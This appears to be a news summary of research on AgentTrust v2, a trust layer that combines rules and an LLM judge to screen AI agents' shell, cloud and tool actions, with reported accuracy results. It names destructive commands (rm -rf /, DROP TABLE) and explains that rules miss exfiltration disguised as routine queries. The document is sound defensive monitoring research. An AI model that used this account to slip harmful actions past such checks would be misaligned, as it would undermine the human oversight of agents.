Researchers have developed AgentTrust v2, a self-improving trust layer for AI agents that distinguishes between lexical and semantic threats. The system achieves 83.6-85.2% accuracy on semantic threats while maintaining zero false-blocks across 45,000 real-world actions, addressing the challenge of securing AI agents that execute shell commands, cloud operations, and arbitrary tool calls.
Lexical and Semantic Threats Require Fundamentally Different Approaches
Chenglin Yang's research introduces a critical distinction between threat types. Lexical threats involve danger in stable tokens decidable by deterministic rules, such as rm -rf / or DROP TABLE commands. Semantic threats involve intent-dependent actions where benign and malicious operations share identical surface characteristics, such as legitimate database queries versus data exfiltration attempts.
A hand-authored cloud rule pack achieved only 48-56% overall accuracy, with 0 percentage point improvement on semantic categories. Data/database threats remained at 29%, observability at 59%, and supply chain at 50%, demonstrating that rules cannot address semantic threats by construction.
AgentTrust v2 Architecture Combines Self-Learning LLM Judge With Distilled Rules
The dual-store architecture features an LLM judge that nearly doubles rule accuracy from 48% to 83.6-85.2% on semantic-heavy corpus while maintaining near-zero false-blocks across two model providers. The system distills growing deterministic rule sets on lexical threats, becoming cheaper over time as more patterns become rule-decidable.
The guarded RAG memory component addresses verdict-cache failures that collapse to 58% accuracy on surface-identical actions. A corroboration guard lifts semantic accuracy by 13 percentage points from 70% to 84%, feeding memory specifically on semantic threats.
Online Replay Shows Continuous Improvement Across 45,000 Actions
Testing on 45,000 real-world actions demonstrated the system's self-evolution:
- Judge-call rate decreased from 50% to 44% as more decisions became rule-decidable
- Judge-domain accuracy increased from 71% to 80% through learning from decisions
- Zero benign hard-blocks across all 45,000 actions
- System becomes both faster on lexical threats and smarter on semantic threats over time
The architecture represents the first formal distinction between lexical and semantic threat classes with experimental proof that they require different approaches. The self-improving design learns from deployment, accumulating both distilled rules for lexical patterns and guarded precedent for semantic cases.
Key Takeaways
- AgentTrust v2 formally distinguishes lexical threats (rule-decidable) from semantic threats (intent-dependent) and proves they require different approaches
- The LLM judge achieves 83.6-85.2% accuracy on semantic threats, nearly doubling the 48% accuracy of hand-authored rules
- Online replay across 45,000 actions showed judge-call rate falling from 50% to 44% while accuracy increased from 71% to 80%
- Zero benign actions were hard-blocked across all 45,000 test actions, maintaining safety without false positives
- The guarded RAG memory lifts semantic accuracy by 13 percentage points from 70% to 84% by using corroboration guards